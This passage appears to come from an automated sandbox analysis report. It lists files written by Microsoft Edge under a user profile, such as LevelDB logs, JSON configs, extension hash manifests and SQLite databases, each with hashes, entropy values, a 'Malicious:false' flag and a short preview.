                                                                                                                                                                                                                                                MD5:9EA84871F336DD1F606A03D471A225F7
                                                                                                                                                                                                                                                SHA1:C222BD00673C83903DC3A8B3431B55693A4121BE
                                                                                                                                                                                                                                                SHA-256:54211542DD2F156EAC4493CF7C279AD5075AFF92DB4EA11745DD6FC94103145E
                                                                                                                                                                                                                                                SHA-512:A3DD092413291FC42EB453F4A169D399F6590FE334B6F3D91532657F8D5F7496A5C5EAF2B2E8E5749F4240880B5AA2121D7DA2E557B396796C0ADCFEB32FB622
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.773 1ef4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/16-11:07:31.801 1ef4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                Entropy (8bit):5.324622178393332
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RT:C1gAg1zfv7
                                                                                                                                                                                                                                                MD5:1A9EE508CEF12C1FD4F27103A6F75039
                                                                                                                                                                                                                                                SHA1:A792C08CD4C7670B690331E294B50E564FA9D59B
                                                                                                                                                                                                                                                SHA-256:EC2CDE4C50F72A626F84817BD610EED415441D08C90102680155CD32110C0F99
                                                                                                                                                                                                                                                SHA-512:6BB30C31E3918131E8093273EDA29C1D6124D55E8EE87D95D7D96DE96FFB9AD6ADCB2E2A69D839D4B78387AC6C66957378F4C87297203E54B5E12A8396014482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.185844225816215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FAF53+q2PcNwi23oH+Tcwt8aPrqIFUt8O/FCFVZmw+O/FCF5VkwOcNwi23oH+o:7/ibOvLZYebL3FUt8O/AV/+O/AH54ZYD
                                                                                                                                                                                                                                                MD5:7FF67B4864DBDFA2B1A7D7430E892098
                                                                                                                                                                                                                                                SHA1:75C0DC14A959A4BC4097FCC7EA9E3F1144C63B90
                                                                                                                                                                                                                                                SHA-256:A176EBEFFA949FBD4C0128CC1AC8B2395ECA3851DFAB2C31493B6FA6A81B9822
                                                                                                                                                                                                                                                SHA-512:210FC458C25B31AF6D2F43C0052D58C9E3107B12379D9E556668F9FCBEBC7C41755668CA635E0CE9C8E858B4E75D83ED5E3CA39F5BCD3CA6061235451890D295
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.825 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-11:07:26.827 16e8 Recovering log #3.2024/12/16-11:07:26.827 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.185844225816215
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FAF53+q2PcNwi23oH+Tcwt8aPrqIFUt8O/FCFVZmw+O/FCF5VkwOcNwi23oH+o:7/ibOvLZYebL3FUt8O/AV/+O/AH54ZYD
                                                                                                                                                                                                                                                MD5:7FF67B4864DBDFA2B1A7D7430E892098
                                                                                                                                                                                                                                                SHA1:75C0DC14A959A4BC4097FCC7EA9E3F1144C63B90
                                                                                                                                                                                                                                                SHA-256:A176EBEFFA949FBD4C0128CC1AC8B2395ECA3851DFAB2C31493B6FA6A81B9822
                                                                                                                                                                                                                                                SHA-512:210FC458C25B31AF6D2F43C0052D58C9E3107B12379D9E556668F9FCBEBC7C41755668CA635E0CE9C8E858B4E75D83ED5E3CA39F5BCD3CA6061235451890D295
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.825 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-11:07:26.827 16e8 Recovering log #3.2024/12/16-11:07:26.827 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.202239767182811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FF3+q2PcNwi23oH+Tcwt865IFUt8O/FD0Zmw+O/FDUVkwOcNwi23oH+Tcwt86L:7/rOvLZYeb/WFUt8O/2/+O/K54ZYeb/L
                                                                                                                                                                                                                                                MD5:0774C3D0D0C3C67442FFEC553F9E4EF6
                                                                                                                                                                                                                                                SHA1:C43E1C55F0A1C83622435B656940C852CB640AB2
                                                                                                                                                                                                                                                SHA-256:A6363E945FC7930D15374C3D05DD503FB1C633ABCFF232F125FBAC63C48898D0
                                                                                                                                                                                                                                                SHA-512:E6DA957F6C58CDDFB2A37B1F929F03B0987472FDA8D042ADA2132B6550979CDF0CD24CF8E58954528D4F6829CD715086ACACF3454A9082A3284379958676255E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.833 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-11:07:26.834 16e8 Recovering log #3.2024/12/16-11:07:26.834 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.202239767182811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/FF3+q2PcNwi23oH+Tcwt865IFUt8O/FD0Zmw+O/FDUVkwOcNwi23oH+Tcwt86L:7/rOvLZYeb/WFUt8O/2/+O/K54ZYeb/L
                                                                                                                                                                                                                                                MD5:0774C3D0D0C3C67442FFEC553F9E4EF6
                                                                                                                                                                                                                                                SHA1:C43E1C55F0A1C83622435B656940C852CB640AB2
                                                                                                                                                                                                                                                SHA-256:A6363E945FC7930D15374C3D05DD503FB1C633ABCFF232F125FBAC63C48898D0
                                                                                                                                                                                                                                                SHA-512:E6DA957F6C58CDDFB2A37B1F929F03B0987472FDA8D042ADA2132B6550979CDF0CD24CF8E58954528D4F6829CD715086ACACF3454A9082A3284379958676255E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.833 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-11:07:26.834 16e8 Recovering log #3.2024/12/16-11:07:26.834 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.199723788070046
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/t4q2PcNwi23oH+Tcwt8NIFUt8O/sU8JZmw+O/sU8DkwOcNwi23oH+Tcwt8+eLJ:7/uvLZYebpFUt8O/1O/+O/1i54ZYebqJ
                                                                                                                                                                                                                                                MD5:3806CADF90B500B0D79DD32492DDEE7B
                                                                                                                                                                                                                                                SHA1:EBB63C685464A287DC83A2F9CC2623AA37AD15AF
                                                                                                                                                                                                                                                SHA-256:E31F517026293E9B207CF524E1B03DAB259A9C5211A348D238A1E5B45CD4C39F
                                                                                                                                                                                                                                                SHA-512:A7034240E2EDCF8D79A77947966819D612C460D6B41C5715AE32DA0654E41B27292D1C999D0EAD6225A006CFEB80645B080F8F5EC3423995D3793AD2974087C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.580 1784 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-11:07:27.581 1784 Recovering log #3.2024/12/16-11:07:27.581 1784 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.199723788070046
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/t4q2PcNwi23oH+Tcwt8NIFUt8O/sU8JZmw+O/sU8DkwOcNwi23oH+Tcwt8+eLJ:7/uvLZYebpFUt8O/1O/+O/1i54ZYebqJ
                                                                                                                                                                                                                                                MD5:3806CADF90B500B0D79DD32492DDEE7B
                                                                                                                                                                                                                                                SHA1:EBB63C685464A287DC83A2F9CC2623AA37AD15AF
                                                                                                                                                                                                                                                SHA-256:E31F517026293E9B207CF524E1B03DAB259A9C5211A348D238A1E5B45CD4C39F
                                                                                                                                                                                                                                                SHA-512:A7034240E2EDCF8D79A77947966819D612C460D6B41C5715AE32DA0654E41B27292D1C999D0EAD6225A006CFEB80645B080F8F5EC3423995D3793AD2974087C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.580 1784 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/16-11:07:27.581 1784 Recovering log #3.2024/12/16-11:07:27.581 1784 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Bl9tFlljq7A/mhWJFuQ3yy7IOWUSNootdweytllrE9SFcTp4AGbNCV9RUI5K:TG75fOAHd0Xi99pEYHK
                                                                                                                                                                                                                                                MD5:78230829051044BB2B30AA1E5A7C7DA4
                                                                                                                                                                                                                                                SHA1:9D58A813D6F89A335952A8ECC6E708528257F0AF
                                                                                                                                                                                                                                                SHA-256:BEDC86A989B895427D82EA419D39BA9049C550A9E83A9916035674FE5B0E0D7E
                                                                                                                                                                                                                                                SHA-512:331EFFF44352F49B6EAC803520CCD9E2CC978E09E9F16CA173AD36DCC30DC40EDBB1EB3154AEBFE2A765B064417B7C5CF623255D4EFD40E4F0211BF1B8B6A713
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:............7......&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                Entropy (8bit):3.647718136575781
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:aj9P0lP/Kbt3QkQerC773pLDc7gam6IChXjl4RKToaAu:adSP/qe2C7OaSpl4RKcC
                                                                                                                                                                                                                                                MD5:0D4F2B61CE4979DECDC4A83722D158FD
                                                                                                                                                                                                                                                SHA1:92F5C5F715706998192409E942A22511904F8390
                                                                                                                                                                                                                                                SHA-256:4ED505DA9C305FA33D1FB0B963A31B0D34B7EB7D8FE6ACF5A7D9DAAA9FF0977F
                                                                                                                                                                                                                                                SHA-512:7731F6876360A251896FA8EBB3DC29E6D24A6845344728B1AF665F21CEB1A6D5EAB8A5220453119F0D2810FB3236ADB4F9C6EBBF944B39F653AB9927BBA0FC39
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                Entropy (8bit):5.281437286232168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/JVvLZYeb8rcHEZrELFUt8O/Jg/+O/KwAI54ZYeb8rcHEZrEZSJ:7/zlYeb8nZrExg8O/G/xoYeb8nZrEZe
                                                                                                                                                                                                                                                MD5:20492F740D4E8FE2CC571A971EFAE353
                                                                                                                                                                                                                                                SHA1:0824F085945D035531C5D96352956F7272E1DDA6
                                                                                                                                                                                                                                                SHA-256:7AA3175F847D2153E966ED8F4EF11EB7BDC8D30D4C0F21E260B93C9514217CBD
                                                                                                                                                                                                                                                SHA-512:8281C8D919B4A902550F7D80457888E0E3F6646F94E1D43FF96E4348275B123475B951040F3A7D157A01AB78A07C191E173C12EA52FCD9E1067BB6AD735346B8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:30.777 450 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-11:07:30.777 450 Recovering log #3.2024/12/16-11:07:30.778 450 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                Entropy (8bit):5.281437286232168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/JVvLZYeb8rcHEZrELFUt8O/Jg/+O/KwAI54ZYeb8rcHEZrEZSJ:7/zlYeb8nZrExg8O/G/xoYeb8nZrEZe
                                                                                                                                                                                                                                                MD5:20492F740D4E8FE2CC571A971EFAE353
                                                                                                                                                                                                                                                SHA1:0824F085945D035531C5D96352956F7272E1DDA6
